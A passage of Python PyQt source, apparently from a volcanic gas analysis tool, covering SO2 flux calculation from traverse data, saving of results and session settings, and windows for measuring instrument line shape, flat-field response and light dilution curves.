    # Create a traverse counter and dictionary to hold the results
    self.flux_data = {}
    self.trav_no = 0
    # Reset the results table
    self.fluxTable.setRowCount(0)
    # Turn off the save flag
    self.save_flag = False
    logger.info('Traverses imported!')
def switch_x_axis(self):
    """Switch the traverse plot x-axis between time and spectrum number."""
    try:
        # Rescale the data for plotting. Reset the order first so a
        # stale scaling is never applied to small-valued data
        self.order = 0
        ploty = self.so2_scd
        if np.nanmax(self.so2_scd) > 1e6:
            self.order = int(np.ceil(np.log10(np.nanmax(ploty)))) - 1
            ploty = ploty / 10**self.order
        plot_err = [ploty - self.so2_err/10**self.order,
                    ploty + self.so2_err/10**self.order]
        # Label matches import_data (previously read "Fit value")
        self.ax.setLabel('left', f'SO2 SCD (1e{self.order})')
        # Pick the requested x-axis data
        if self.widgets.get('x_axis') == 'Time':
            plotx = self.so2_time
        else:
            plotx = self.so2_num
        # Update the graph
        self.ax_elements['line'].setData(plotx, ploty)
        self.ax_elements['hi_err'].setData(plotx, plot_err[0])
        self.ax_elements['lo_err'].setData(plotx, plot_err[1])
        self.ax_elements['region_select'].setRegion([plotx[0], plotx[-1]])
    except AttributeError:
        # No traverse data imported yet
        pass
# =============================================================================
# Calculate Flux
# =============================================================================
def calc_flux(self):
    """Calculate the SO2 flux from the selected traverse.

    Integrates the baseline-corrected SO2 column densities across the
    selected section of the traverse (corrected for the angle between
    the travel direction and the plume direction from the vent),
    multiplies by the wind speed to obtain a flux, adds the result to
    the results table and map, and stores the traverse in
    self.flux_data.
    """
    logger.info('Calculating flux:')
    # Pull the relevant data from the GUI
    vlat = float(self.vlat.text())
    vlon = float(self.vlon.text())
    wind_speed = float(self.widgets.get('wind_speed'))
    wind_error = float(self.widgets.get('wind_error'))
    flux_units = self.widgets.get('flux_units')
    wind_units = self.widgets.get('wind_units')
    err_units = self.widgets.get('err_units')
    # Express the wind error as a fraction of the wind speed
    if err_units == 'abs':
        wind_error = wind_error / wind_speed
    else:
        wind_error = wind_error / 100
    # If wind speed is in knots, convert to m/s
    if wind_units == 'knots':
        wind_speed = wind_speed * 0.5144444444
    else:
        wind_speed = wind_speed
    logger.info(f'Wind speed: {wind_speed:.02f} m/s')
    # Find the bounds of the selected area
    i0, i1 = self.ax_elements['region_select'].getRegion()
    if self.widgets.get('x_axis') == 'Time':
        idx = np.where(np.logical_and(self.so2_time >= i0,
                                      self.so2_time <= i1))
    else:
        idx = np.where(np.logical_and(self.so2_num >= i0,
                                      self.so2_num <= i1))
    # Extract the traverse from the SO2 data
    so2_time = self.so2_time[idx]
    so2_scd = self.so2_scd[idx]
    so2_err = self.so2_err[idx]
    lat = self.lat[idx]
    lon = self.lon[idx]
    # Correct the baseline in SO2. The baseline line is in display
    # units, so rescale by the display order first
    baseline = self.ax_elements['baseline'].value()*(10**self.order)
    so2_scd = np.subtract(so2_scd, baseline)
    # Find the centre of mass of the plume: the point at which the
    # cumulative SO2 reaches half of the traverse total
    cum_so2_scd = np.nancumsum(so2_scd)
    peak_idx = np.abs(cum_so2_scd - cum_so2_scd[-1]/2).argmin()
    # Calculate the plume bearing from the vent to the plume centre
    volc_loc = [vlat, vlon]
    peak_loc = [lat[peak_idx], lon[peak_idx]]
    plume_dist, plume_bearing = haversine(volc_loc, peak_loc)
    logger.info(f'Distance from vent: {plume_dist:.02f} m')
    logger.info(f'Azimuth from vent: {np.degrees(plume_bearing):.02f} deg')
    # Calculate the distance and bearing of each measurement vector
    # (between consecutive GPS points)
    vect = [haversine([lat[i-1], lon[i-1]], [lat[i], lon[i]])
            for i in range(1, len(lat))]
    # Unpack the distance and bearing from the vectors
    trav_dist, trav_bearing = np.asarray(vect).T
    # Correct the distance for the angle between the travel and plume
    # vectors
    corr_factor = np.sin(plume_bearing-trav_bearing)
    corr_dist = np.multiply(trav_dist, corr_factor)
    # Convert so2 amounts from molecules.cm-2 to molecules.m-2
    so2_molec_per_m2 = so2_scd * 1.0e4
    # Multiply by the distance moved and sum along the traverse
    so2_molec_per_m = np.nansum(np.multiply(so2_molec_per_m2[1:],
                                            corr_dist))
    # Multiply by the wind speed
    so2_molec_per_s = so2_molec_per_m * wind_speed
    # Convert to moles (divide by Avogadro's number)
    so2_moles_per_s = so2_molec_per_s / 6.022e23
    # Convert to kg/s. Molar mass of SO2 is 64.066 g/mole
    so2_kg_per_s = so2_moles_per_s * 0.064066
    logger.info(f'Total SO2 mass: {abs(so2_kg_per_s/wind_speed):.02f} kg')
    # Convert to t/day if required
    if flux_units == 't/day':
        flux = abs(so2_kg_per_s * 60*60*24 / 1000.0)
    else:
        flux = abs(so2_kg_per_s)
    logger.info(f'SO2 Flux: {flux:.02f} {flux_units}')
    # Calculate the flux error: fractional SO2 error (ignoring infinite
    # errors) combined in quadrature with the fractional wind error
    so2_err[abs(so2_err) == np.inf] = np.nan
    tot_so2_err = np.nansum(so2_err)
    frac_so2_err = tot_so2_err / np.nansum(so2_scd)
    # Combine with the wind speed error
    frac_err = ((frac_so2_err)**2 + (wind_error)**2)**0.5
    flux_err = flux * frac_err
    # Add the flux result to the table
    self.fluxTable.setRowCount(self.fluxTable.rowCount()+1)
    self.fluxTable.setItem(self.trav_no, 0,
                           QTableWidgetItem(f'{flux:.02f}'))
    self.fluxTable.setItem(self.trav_no, 1,
                           QTableWidgetItem(f'{flux_err:.02f}'))
    # Plot the traverse graphs
    self.map_elements['trav_line'].setData(lon, lat)
    self.map_elements['plume_start'].setData([lon[0]], [lat[0]])
    self.map_elements['plume_cent'].setData([peak_loc[1]], [peak_loc[0]])
    self.map_elements['plume_stop'].setData([lon[-1]], [lat[-1]])
    self.map_elements['volcano'].setData([vlon], [vlat])
    # Collate the results for saving
    output_data = np.column_stack([so2_time[1:], so2_scd[1:], so2_err[1:],
                                   lat[1:], lon[1:], trav_dist,
                                   trav_bearing, corr_factor])
    self.flux_data[f'trav{self.trav_no}'] = {'flux': flux,
                                             'flux_err': flux_err,
                                             'flux_units': flux_units,
                                             'wind_speed': wind_speed,
                                             'vlat': vlat,
                                             'vlon': vlon,
                                             'peak_loc': peak_loc,
                                             'output_data': output_data}
    # Increment the counter and flag that there is unsaved data
    self.trav_no += 1
    self.save_flag = True
def del_trav(self):
    """Delete the last traverse."""
    if self.trav_no <= 0:
        return
    logger.info('Removing last traverse')
    # Step the counter back and drop the matching entry and table row
    self.trav_no -= 1
    self.flux_data.pop(f'trav{self.trav_no}')
    self.fluxTable.setRowCount(self.fluxTable.rowCount()-1)
    # Nothing left to save once all traverses have been removed
    if self.trav_no == 0:
        self.save_flag = False
def save_fluxes(self):
    """Output the flux results.

    Writes a detailed flux_results.csv holding every traverse and a
    flux_summary.txt with the individual, average and weighted-mean
    fluxes, then clears the unsaved-data flag.
    """
    # Make sure the output directory exists, and create if not
    out_path = self.widgets.get('out_path')
    if not os.path.isdir(out_path):
        os.makedirs(out_path)
    # Write the detailed output. The file is opened ONCE so that every
    # traverse is recorded - previously it was reopened in 'w' mode
    # inside the loop, truncating it and keeping only the last traverse
    with open(out_path + 'flux_results.csv', 'w') as w:
        for i, data in enumerate(self.flux_data.values()):
            w.write(f'Traverse Number,{i+1}\n'
                    + f'Flux ({data["flux_units"]}),{data["flux"]}\n'
                    + f'Error ({data["flux_units"]}),{data["flux_err"]}\n'
                    + f'Wind Speed (m/s), {data["wind_speed"]}\n'
                    + f'Volcano Lat/Lon,{data["vlat"]},{data["vlon"]}\n'
                    + f'Plume Center,{data["peak_loc"][0]},'
                    + f'{data["peak_loc"][1]}\n'
                    + 'Time (Decimal hours),SO2 SCD,SO2 Err,Lat,Lon,'
                    + 'Distance,Bearing,Correction Factor\n')
            # One line per measurement point
            for row in data["output_data"]:
                w.write(str(row[0]))
                for val in row[1:]:
                    w.write(f',{val}')
                w.write('\n')
            w.write('\n')
    # Write summary output (units taken from the last traverse)
    flux_units = data["flux_units"]
    fluxes = [d['flux'] for d in self.flux_data.values()]
    errors = [d['flux_err'] for d in self.flux_data.values()]
    # Weighted mean using inverse-variance weights
    w_mean_flux = np.average(fluxes, weights=np.power(errors, -2))
    w_mean_error = (1 / np.sum(np.power(errors, -2)))**0.5
    with open(out_path + 'flux_summary.txt', 'w') as w:
        w.write(f'Flux Summary\nFlux ({flux_units}), Error\n')
        for flux, err in zip(fluxes, errors):
            w.write(f'{flux}, {err}\n')
        w.write(f'Av Flux = {np.average(fluxes):.02f} {flux_units}\n')
        w.write(f'Stdev = {np.std(fluxes):.02f} {flux_units}\n')
        w.write(f'Weighted Mean Flux = {w_mean_flux:.02f}'
                + f' (+/- {w_mean_error:.02f}) {flux_units}')
    logger.info('Fluxes saved')
    self.save_flag = False
def closeEvent(self, event):
    """Handle GUI closure, prompting to save any unsaved fluxes."""
    if not self.save_flag:
        # Nothing unsaved - just store the session settings and allow
        # the window to close (default event behaviour)
        self.save_config()
        return
    # Ask whether to save the outstanding fluxes before closing
    options = QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
    reply = QMessageBox.question(self, 'Message',
                                 "Would you like to save the fluxes?",
                                 options, QMessageBox.Cancel)
    if reply == QMessageBox.Yes:
        self.save_fluxes()
        self.save_config()
        event.accept()
    elif reply == QMessageBox.No:
        event.accept()
        self.save_config()
    else:
        # Cancelled - keep the window open
        event.ignore()
def load_config(self):
    """Load previous session settings from the config file."""
    try:
        with open('bin/.calc_flux_config.yml', 'r') as ymlfile:
            config = yaml.load(ymlfile, Loader=yaml.FullLoader)
    except FileNotFoundError:
        logger.warning('Unable to load config file!')
        return
    # Push each saved value back into its widget, skipping any that
    # no longer exist or fail to set
    for key, item in config.items():
        try:
            self.widgets.set(key, item)
        except Exception:
            logger.warning(f'Failed to load {key} from config file')
def save_config(self):
    """Save the current session settings to the config file."""
    # Collect the current value of every widget
    config = {key: self.widgets.get(key) for key in self.widgets}
    # Write the config
    with open('bin/.calc_flux_config.yml', 'w') as outfile:
        yaml.dump(config, outfile)
# =============================================================================
# Measure ILS
# =============================================================================
class ILSWindow(QMainWindow):
    """Window to measure the instrument line shape (ILS).

    The user selects spectra of a line source (optionally with dark
    spectra to subtract), highlights a single line on the averaged
    spectrum and fits a super-Gaussian to it. The fitted parameters can
    then be saved to a text file for use in analysis.
    """

    def __init__(self, parent=None):
        """Initialise the ILS window."""
        super(ILSWindow, self).__init__(parent)
        # Set the window properties
        self.setWindowTitle('Measure ILS')
        self.statusBar().showMessage('Ready')
        self.setGeometry(40, 40, 1000, 600)
        self.setWindowIcon(QIcon('bin/icons/ils.png'))
        # Set the window layout inside a scrollable central widget
        self.generalLayout = QGridLayout()
        self._centralWidget = QScrollArea()
        self.widget = QWidget()
        self.setCentralWidget(self._centralWidget)
        self.widget.setLayout(self.generalLayout)
        # Scroll Area Properties
        self._centralWidget.setWidgetResizable(True)
        self._centralWidget.setWidget(self.widget)
        self._createApp()

    def _createApp(self):
        """Build the file inputs, control buttons and graphs."""
        layout = QGridLayout(self._centralWidget)
        # Add option for spectra type
        layout.addWidget(QLabel('Format:'), 0, 0)
        self.spec_type = QComboBox()
        self.spec_type.setToolTip('Choose spectrum format')
        self.spec_type.addItems(['iFit',
                                 'Master.Scope',
                                 'Spectrasuite',
                                 'mobileDOAS',
                                 'Basic'])
        self.spec_type.setFixedSize(100, 20)
        layout.addWidget(self.spec_type, 0, 1)
        # Add an input for the spectra selection
        layout.addWidget(QLabel('Spectra:'), 1, 0)
        self.spec_fnames = QTextEdit()
        self.spec_fnames.setFixedSize(300, 150)
        layout.addWidget(self.spec_fnames, 1, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
        layout.addWidget(btn, 1, 4)
        # Add an input for the dark spectra selection
        layout.addWidget(QLabel('Dark\nSpectra:'), 2, 0)
        self.dark_fnames = QTextEdit()
        self.dark_fnames.setFixedSize(300, 150)
        layout.addWidget(self.dark_fnames, 2, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
        layout.addWidget(btn, 2, 4)
        # Add an input for the save selection
        layout.addWidget(QLabel('Save:'), 3, 0)
        self.save_path = QLineEdit()
        layout.addWidget(self.save_path, 3, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.save_path,
                                    'save'))
        layout.addWidget(btn, 3, 4)
        # Action buttons: import the spectra, fit the ILS, save the fit
        btn = QPushButton('Import')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.import_spectra)
        layout.addWidget(btn, 4, 1)
        btn = QPushButton('Fit')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.measure_ils)
        layout.addWidget(btn, 4, 2)
        btn = QPushButton('Save')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.save_fit)
        layout.addWidget(btn, 4, 3)
        graphwin = pg.GraphicsLayoutWidget(show=True)
        pg.setConfigOptions(antialias=True)
        w = QWidget()
        glayout = QGridLayout(w)
        # Make the graphs: raw spectrum (top) and fitted line (bottom)
        self.ax0 = graphwin.addPlot(row=0, col=0)
        self.ax1 = graphwin.addPlot(row=1, col=0)
        self.plot_axes = [self.ax0, self.ax1]
        for ax in self.plot_axes:
            ax.setDownsampling(mode='peak')
            ax.setClipToView(True)
            ax.showGrid(x=True, y=True)
        # Add axis labels
        self.ax0.setLabel('left', 'Intensity (counts)')
        self.ax1.setLabel('left', 'Intensity (arb)')
        self.ax1.setLabel('bottom', 'Wavelength (nm)')
        # Add the graphs to the layout
        glayout.addWidget(graphwin, 0, 0, 1, 7)
        layout.addWidget(w, 0, 5, 5, 1)

    def import_spectra(self):
        """Read in ILS spectra and display."""
        # Read in and average the dark spectra (zero if none are given)
        files = self.dark_fnames.toPlainText()
        if files == '':
            dark = 0
        else:
            x, dark = average_spectra(files.split('\n'),
                                      self.spec_type.currentText())
        # Read in and average the measurement spectra
        # NOTE(review): these are read with np.loadtxt regardless of the
        # selected format, unlike the darks - confirm this is intended
        for i, fname in enumerate(self.spec_fnames.toPlainText().split('\n')):
            x, y = np.loadtxt(fname, unpack=True)
            if i == 0:
                spec = y
            else:
                spec += y
        self.x = x
        self.spec = np.divide(spec, i+1) - dark
        # Add to the graph
        self.ax0.clear()
        self.l0 = self.ax0.plot(self.x, self.spec,
                                pen=pg.mkPen(color='#1f77b4', width=1.0))
        # Add the region selector
        self.lr = pg.LinearRegionItem([x[0], x[-1]])
        self.lr.setZValue(-10)
        self.ax0.addItem(self.lr)

    def measure_ils(self):
        """Measure the ILS on the selected line."""
        # Get the highlighted region
        i0, i1 = self.lr.getRegion()
        idx = np.where(np.logical_and(self.x >= i0, self.x <= i1))
        grid = self.x[idx]
        line = self.spec[idx]
        # Find the line peak
        center = grid[line.argmax()]
        # Center grid on zero
        grid = grid - center
        # Remove the offset and normalise
        line = line - min(line)
        line = np.divide(line, max(line))
        # Fit super gaussian
        p0 = [0.34, 2, 0.0, 0.0, 0.0, 1.0, 0.0]
        self.popt, pcov = curve_fit(super_gaussian, grid, line, p0=p0)
        ngrid = np.arange(grid[0], grid[-1]+0.01, 0.01)
        fit = super_gaussian(ngrid, *self.popt)
        # Plot the measured points and the fitted curve
        self.ax1.clear()
        self.ax1.plot(grid, line, pen=None, symbol='+', symbolPen=None,
                      symbolSize=10, symbolBrush='#1f77b4')
        self.ax1.plot(ngrid, fit, pen=pg.mkPen(color='#ff7f0e', width=1.0))

    def save_fit(self):
        """Save the ILS fit parameters."""
        w, k, a_w, a_k, shift, amp, offset = self.popt
        # Only the shape parameters are saved; the full width at half of
        # the e-folding maximum (FWEM) is twice the fitted half width
        fwem = 2*w
        np.savetxt(self.save_path.text(), [fwem, k, a_w, a_k],
                   header='ILS parameters (FWEM, k, a_w, a_k)')
# =============================================================================
# Measure Flat Spectrum
# =============================================================================
class FLATWindow(QMainWindow):
    """Open a window for flat-field analysis.

    Averages measured spectra (minus optional darks), smooths a
    user-selected wavelength region with a boxcar and saves the ratio
    of the measured to smoothed spectrum as the flat-field response.
    """

    def __init__(self, parent=None):
        """Initialise the window."""
        super(FLATWindow, self).__init__(parent)
        # Set the window properties
        self.setWindowTitle('Measure Flat Field')
        self.statusBar().showMessage('Ready')
        self.setGeometry(40, 40, 1000, 500)
        self.setWindowIcon(QIcon('bin/icons/flat.png'))
        # Set the window layout inside a scrollable central widget
        self.generalLayout = QGridLayout()
        self._centralWidget = QScrollArea()
        self.widget = QWidget()
        self.setCentralWidget(self._centralWidget)
        self.widget.setLayout(self.generalLayout)
        # Scroll Area Properties
        self._centralWidget.setWidgetResizable(True)
        self._centralWidget.setWidget(self.widget)
        self._createApp()

    def _createApp(self):
        """Build the file inputs, control buttons and graphs."""
        layout = QGridLayout(self._centralWidget)
        # Add an input for the spectra selection
        layout.addWidget(QLabel('Spectra:'), 0, 0)
        self.spec_fnames = QTextEdit()
        self.spec_fnames.setFixedSize(300, 150)
        layout.addWidget(self.spec_fnames, 0, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
        layout.addWidget(btn, 0, 4)
        # Add an input for the dark spectra selection
        layout.addWidget(QLabel('Dark\nSpectra:'), 1, 0)
        self.dark_fnames = QTextEdit()
        self.dark_fnames.setFixedSize(300, 150)
        layout.addWidget(self.dark_fnames, 1, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
        layout.addWidget(btn, 1, 4)
        # Add an input for the save selection
        layout.addWidget(QLabel('Save:'), 2, 0)
        self.save_path = QLineEdit()
        layout.addWidget(self.save_path, 2, 1, 1, 3)
        btn = QPushButton('Browse')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(partial(browse, self, self.save_path,
                                    'save'))
        layout.addWidget(btn, 2, 4)
        # Action buttons: import the spectra, fit the flat, save the fit
        btn = QPushButton('Import')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.import_spectra)
        layout.addWidget(btn, 3, 1)
        btn = QPushButton('Fit')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.measure_flat)
        layout.addWidget(btn, 3, 2)
        btn = QPushButton('Save')
        btn.setFixedSize(70, 25)
        btn.clicked.connect(self.save_fit)
        layout.addWidget(btn, 3, 3)
        graphwin = pg.GraphicsLayoutWidget(show=True)
        pg.setConfigOptions(antialias=True)
        w = QWidget()
        glayout = QGridLayout(w)
        # Make the graphs: raw spectrum, smoothed region, flat response
        self.ax0 = graphwin.addPlot(row=0, col=0)
        self.ax1 = graphwin.addPlot(row=1, col=0)
        self.ax2 = graphwin.addPlot(row=2, col=0)
        self.plot_axes = [self.ax0, self.ax1, self.ax2]
        for ax in self.plot_axes:
            ax.setDownsampling(mode='peak')
            ax.setClipToView(True)
            ax.showGrid(x=True, y=True)
        # Add axis labels
        self.ax0.setLabel('left', 'Intensity (counts)')
        self.ax1.setLabel('left', 'Intensity (counts)')
        self.ax2.setLabel('left', 'Flat Response')
        self.ax2.setLabel('bottom', 'Wavelength (nm)')
        # Add the graphs to the layout
        glayout.addWidget(graphwin, 0, 0, 1, 7)
        layout.addWidget(w, 0, 5, 5, 1)

    def import_spectra(self):
        """Read in ILS spectra and display."""
        # Read in the dark spectra and average them (zero if none given)
        files = self.dark_fnames.toPlainText()
        if files == '':
            dark = 0
        else:
            for i, fname in enumerate(files.split('\n')):
                x, y = np.loadtxt(fname, unpack=True)
                if i == 0:
                    spec = y
                else:
                    spec += y
            dark = np.divide(spec, i+1)
        # Read in the measurement spectra, average and dark-correct
        for i, fname in enumerate(self.spec_fnames.toPlainText().split('\n')):
            x, y = np.loadtxt(fname, unpack=True)
            if i == 0:
                spec = y
            else:
                spec += y
        self.x = x
        self.y = np.divide(spec, i+1) - dark
        # Add to the graph, clearing any previous results
        self.ax0.clear()
        self.ax1.clear()
        self.ax2.clear()
        self.l0 = self.ax0.plot(self.x, self.y,
                                pen=pg.mkPen(color='#1f77b4', width=1.0))
        # Add the region selector
        self.lr = pg.LinearRegionItem([x[0], x[-1]])
        self.lr.setZValue(-10)
        self.ax0.addItem(self.lr)

    def measure_flat(self):
        """Measure the flat spectrum across the selected region."""
        # Width of the boxcar smoothing window (in points)
        width = 5
        # Get the highlighted region
        i0, i1 = self.lr.getRegion()
        idx = np.where(np.logical_and(self.x >= i0, self.x <= i1))
        self.grid = self.x[idx]
        self.spec = self.y[idx]
        # Create the boxcar window
        window = np.ones(width) / width
        # Pad the array with edge values to avoid edge effects
        pre_array = np.ones(width-1) * self.spec[0]
        post_array = np.ones(width-1) * self.spec[-1]
        # Add padding to the original array
        spec = np.append(pre_array, self.spec)
        spec = np.append(spec, post_array)
        # Convolve with boxcar to smooth
        smooth_spec = np.convolve(spec, window, 'same')
        # Cut array back to the original size
        smooth_spec = smooth_spec[width-1:-(width-1)]
        self.ax1.plot(self.grid, self.spec, pen=pg.mkPen(color='#1f77b4'))
        self.ax1.plot(self.grid, smooth_spec, pen=pg.mkPen(color='#ff7f0e'))
        # The flat response is the ratio of measured to smoothed data
        self.flat = np.divide(self.spec, smooth_spec)
        self.ax2.plot(self.grid, self.flat, pen=pg.mkPen(color='#1f77b4'))

    def save_fit(self):
        """Save the flat response."""
        data = np.column_stack([self.grid, self.flat])
        header = 'Flat spectrum\nWavelength (nm), Flat Response'
        np.savetxt(self.save_path.text(), data, header=header)
# =============================================================================
# Measure Light Dilution
# =============================================================================
class LDFWindow(QMainWindow):
"""Open a window for light dilution analysis."""
def __init__(self, widgetData, parent=None):
    """Initialise the window.

    Parameters
    ----------
    widgetData : dict-like
        Widget values passed from the main GUI (read for 'spec_type',
        updated with fit window limits before analysis)
    parent : QWidget, optional
        Parent widget. Default is None
    """
    super(LDFWindow, self).__init__(parent)
    # Set the window properties
    self.setWindowTitle('Light Dilution Analysis')
    self.statusBar().showMessage('Ready')
    self.setGeometry(40, 40, 1200, 700)
    self.setWindowIcon(QIcon('bin/icons/ldf.png'))
    # Generate the threadpool for launching background processes
    self.threadpool = QThreadPool()
    # Set the window layout inside a scrollable central widget
    self.generalLayout = QGridLayout()
    self._centralWidget = QScrollArea()
    self.widget = QWidget()
    self.setCentralWidget(self._centralWidget)
    self.widget.setLayout(self.generalLayout)
    # Scroll Area Properties
    self._centralWidget.setWidgetResizable(True)
    self._centralWidget.setWidget(self.widget)
    # Save the main GUI widget data
    self.widgetData = widgetData
    self._createApp()
def _createApp(self):
    """Create the main app widgets."""
    # Frames for the controls, outputs and graphs
    self.controlFrame = QFrame(self)
    self.controlFrame.setFrameShape(QFrame.StyledPanel)
    self.outputFrame = QFrame(self)
    self.outputFrame.setFrameShape(QFrame.StyledPanel)
    self.graphFrame = QFrame(self)
    self.graphFrame.setFrameShape(QFrame.StyledPanel)
    # Stack controls above outputs, then place the graphs alongside,
    # using splitters so the user can resize each section
    vsplit = QSplitter(Qt.Vertical)
    vsplit.addWidget(self.controlFrame)
    vsplit.addWidget(self.outputFrame)
    hsplit = QSplitter(Qt.Horizontal)
    hsplit.addWidget(vsplit)
    hsplit.addWidget(self.graphFrame)
    self.generalLayout.addWidget(hsplit)
    # Populate the frames
    self._createControls()
    self._createOutput()
    self._createGraphs()
# =============================================================================
# Program controls
# =============================================================================
def _createControls(self):
    """Create main analysis controls.

    Two tabs: one to generate light dilution curves from measured
    spectra, and one to load previously generated curves together with
    iFit results from the two fit windows.
    """
    # Setup tab layout
    tablayout = QGridLayout(self.controlFrame)
    # Generate tabs for the gaphs and settings
    tab1 = QWidget()
    tab2 = QWidget()
    # Form the tab widget
    tabwidget = QTabWidget()
    tabwidget.addTab(tab1, 'Generate Curves')
    tabwidget.addTab(tab2, 'Load Data')
    tablayout.addWidget(tabwidget, 0, 0)

    # Generate Curves =====================================================

    # Setup the main layout
    layout = QGridLayout(tab1)
    layout.setAlignment(Qt.AlignTop)
    # Create an option menu for the spectra format
    layout.addWidget(QLabel('Format:'), 0, 0)
    self.spec_type = QComboBox()
    self.spec_type.addItems(['iFit',
                             'Master.Scope',
                             'Spectrasuite',
                             'mobileDOAS',
                             'Basic'])
    self.spec_type.setFixedSize(100, 20)
    layout.addWidget(self.spec_type, 0, 1)
    # Default the format to the one selected in the main GUI
    index = self.spec_type.findText(self.widgetData['spec_type'],
                                    Qt.MatchFixedString)
    if index >= 0:
        self.spec_type.setCurrentIndex(index)
    # Add an input for the spectra selection
    layout.addWidget(QLabel('Spectra:'), 1, 0)
    self.spec_fnames = QTextEdit()
    self.spec_fnames.setFixedHeight(75)
    layout.addWidget(self.spec_fnames, 1, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
    layout.addWidget(btn, 1, 4)
    # Add an input for the dark selection
    layout.addWidget(QLabel('Dark Spectra:'), 2, 0)
    self.dark_fnames = QTextEdit()
    self.dark_fnames.setFixedHeight(75)
    layout.addWidget(self.dark_fnames, 2, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
    layout.addWidget(btn, 2, 4)
    # Add spinboxes for the two fit windows (low/high edges in nm)
    layout.addWidget(QLabel('Fit Window 1:\n (nm)'), 3, 0, 2, 1)
    self.wb1_lo = DSpinBox(306, [0, 10000], 0.1)
    self.wb1_lo.setFixedSize(70, 20)
    layout.addWidget(self.wb1_lo, 3, 1)
    self.wb1_hi = DSpinBox(316, [0, 10000], 0.1)
    self.wb1_hi.setFixedSize(70, 20)
    layout.addWidget(self.wb1_hi, 4, 1)
    layout.addWidget(QLabel('Fit Window 2:\n (nm)'), 3, 2, 2, 1)
    self.wb2_lo = DSpinBox(312, [0, 10000], 0.1)
    self.wb2_lo.setFixedSize(70, 20)
    layout.addWidget(self.wb2_lo, 3, 3)
    self.wb2_hi = DSpinBox(322, [0, 10000], 0.1)
    self.wb2_hi.setFixedSize(70, 20)
    layout.addWidget(self.wb2_hi, 4, 3)
    # Add entries for the SO2 grid
    layout.addWidget(QLabel('SO<sub>2</sub> Grid Low:'), 5, 0)
    self.so2_grid_lo = QLineEdit()
    self.so2_grid_lo.setText('0.0')
    self.so2_grid_lo.setFixedSize(100, 20)
    layout.addWidget(self.so2_grid_lo, 5, 1)
    layout.addWidget(QLabel('SO<sub>2</sub> Grid High:'), 6, 0)
    self.so2_grid_hi = QLineEdit()
    self.so2_grid_hi.setText('1.0e19')
    self.so2_grid_hi.setFixedSize(100, 20)
    layout.addWidget(self.so2_grid_hi, 6, 1)
    layout.addWidget(QLabel('SO<sub>2</sub> Grid Step:'), 7, 0)
    self.so2_grid_step = QLineEdit()
    self.so2_grid_step.setText('5.0e17')
    self.so2_grid_step.setFixedSize(100, 20)
    layout.addWidget(self.so2_grid_step, 7, 1)
    # Add entries for the LDF (light dilution factor) grid
    layout.addWidget(QLabel('LDF Grid Low:'), 5, 2)
    self.ldf_grid_lo = QLineEdit()
    self.ldf_grid_lo.setText('0.0')
    self.ldf_grid_lo.setFixedSize(100, 20)
    layout.addWidget(self.ldf_grid_lo, 5, 3)
    layout.addWidget(QLabel('LDF Grid High:'), 6, 2)
    self.ldf_grid_hi = QLineEdit()
    self.ldf_grid_hi.setText('0.9')
    self.ldf_grid_hi.setFixedSize(100, 20)
    layout.addWidget(self.ldf_grid_hi, 6, 3)
    layout.addWidget(QLabel('LDF Grid Step:'), 7, 2)
    self.ldf_grid_step = QLineEdit()
    self.ldf_grid_step.setText('0.1')
    self.ldf_grid_step.setFixedSize(100, 20)
    layout.addWidget(self.ldf_grid_step, 7, 3)
    # Add an input for the save selection
    layout.addWidget(QLabel('Output File:'), 8, 0)
    self.save_path = QLineEdit()
    self.save_path.setFixedHeight(25)
    layout.addWidget(self.save_path, 8, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.save_path,
                                'save', "Text (*.txt)"))
    layout.addWidget(btn, 8, 4)
    # Add button to begin analysis
    self.start_btn = QPushButton('Begin!')
    self.start_btn.clicked.connect(partial(self.calc_ld_curves))
    self.start_btn.setFixedSize(90, 25)
    layout.addWidget(self.start_btn, 9, 1)
    # Add button to save the generated curves (enabled after analysis)
    self.save_btn = QPushButton('Save')
    self.save_btn.clicked.connect(partial(self.save_ld_curves))
    self.save_btn.setFixedSize(90, 25)
    self.save_btn.setEnabled(False)
    layout.addWidget(self.save_btn, 9, 2)

    # Load Curves =========================================================

    # Setup the main layout
    layout = QGridLayout(tab2)
    layout.setAlignment(Qt.AlignTop)
    # Add an input for the loading selection
    layout.addWidget(QLabel('Light Dilution\nCurve File:'), 0, 0)
    self.load_path = QLineEdit()
    self.load_path.setFixedHeight(25)
    layout.addWidget(self.load_path, 0, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.load_path,
                                'single', "Text (*.txt)"))
    layout.addWidget(btn, 0, 4)
    btn = QPushButton('Load')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(self.load_ld_curves)
    layout.addWidget(btn, 0, 5)
    layout.addWidget(QHLine(), 1, 0, 1, 5)
    # Add inputs for the iFit output files from the two fit windows
    layout.addWidget(QLabel('iFit Output:\n(W1):'), 2, 0)
    self.ifit_1_path = QLineEdit()
    self.ifit_1_path.setFixedHeight(25)
    layout.addWidget(self.ifit_1_path, 2, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.ifit_1_path,
                                'single', "Comma separated (*.csv)"))
    layout.addWidget(btn, 2, 4)
